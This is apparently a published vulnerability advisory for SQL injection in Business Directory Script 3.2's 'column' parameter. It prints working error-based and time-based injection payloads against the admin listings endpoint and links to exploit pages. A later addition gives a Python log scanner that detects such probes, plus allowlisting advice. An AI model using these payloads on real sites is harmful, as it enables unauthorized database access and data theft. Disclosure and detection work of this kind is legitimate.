Business Directory Script 3.2 SQL Injection
Business Directory Script version 3.2 suffers from a remote SQL injection vulnerability.
## Title: Business-Directory-Script-3.2 SQLi
## Author: nu11secur1ty
## Date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `column` parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the column parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Additionally, the payload (select*from(select(sleep(20)))a) was submitted in the column parameter. The application took 20271 milliseconds to respond to the request, compared with 230 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The attacker can steal all information from the database of the server of this application!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: column (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT 6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)

## Time spent:
01:35:00
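
A detection sketch for the behaviour described above, added here and not part of the original advisory: it scans access-log lines for requests to the `pjAdminListings` controller whose `column` or `direction` value is not what a sort control would send, and records a long response time as corroboration of a time-based probe. The log layout, the `/index.php` path, the column names `listing_title` and `created`, and the 5000 ms threshold are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log: "METHOD URL STATUS RESPONSE_MS" (assumed layout).
SAMPLE_LOG = """\
GET /index.php?controller=pjAdminListings&action=pjActionGetListing&column=listing_title&direction=ASC&page=1&rowCount=10 200 230
GET /index.php?controller=pjAdminListings&action=pjActionGetListing&column=%27&direction=ASC&page=1&rowCount=10 200 241
GET /index.php?controller=pjAdminListings&action=pjActionGetListing&column=(select*from(select(sleep(20)))a)&direction=ASC&page=1&rowCount=10 200 20271
GET /index.php?controller=pjAdminListings&action=pjActionGetListing&column=created&direction=DESC&page=2&rowCount=10 200 198
"""

IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_.]*\Z")  # bare column name only
DIRECTIONS = {"ASC", "DESC"}
SLOW_MS = 5000  # assumed threshold; the advisory saw ~230 ms normally


def inspect(line):
    """Return the reasons a single log line looks like a probe of `column`."""
    _method, rest = line.split(" ", 1)
    url, _status, ms = rest.rsplit(" ", 2)
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if query.get("controller") != ["pjAdminListings"]:
        return []
    reasons = []
    for col in query.get("column", []):
        if col and not IDENTIFIER.match(col):
            reasons.append(f"column is not a bare identifier: {col!r}")
    for direction in query.get("direction", []):
        if direction and direction.upper() not in DIRECTIONS:
            reasons.append(f"direction is not ASC/DESC: {direction!r}")
    # Timing only corroborates an already suspicious request.
    if reasons and int(ms) >= SLOW_MS:
        reasons.append(f"response took {ms} ms (possible time-based probe)")
    return reasons


def scan(log_text):
    """Return [(line_number, reasons)] for every suspicious line."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), 1):
        reasons = inspect(line) if line.strip() else []
        if reasons:
            findings.append((number, reasons))
    return findings


if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: " + "; ".join(reasons))
```

The same identifier and direction checks, applied server-side as an allowlist before the value reaches the query, are the usual fix for sort parameters, since column names cannot be bound as prepared-statement parameters.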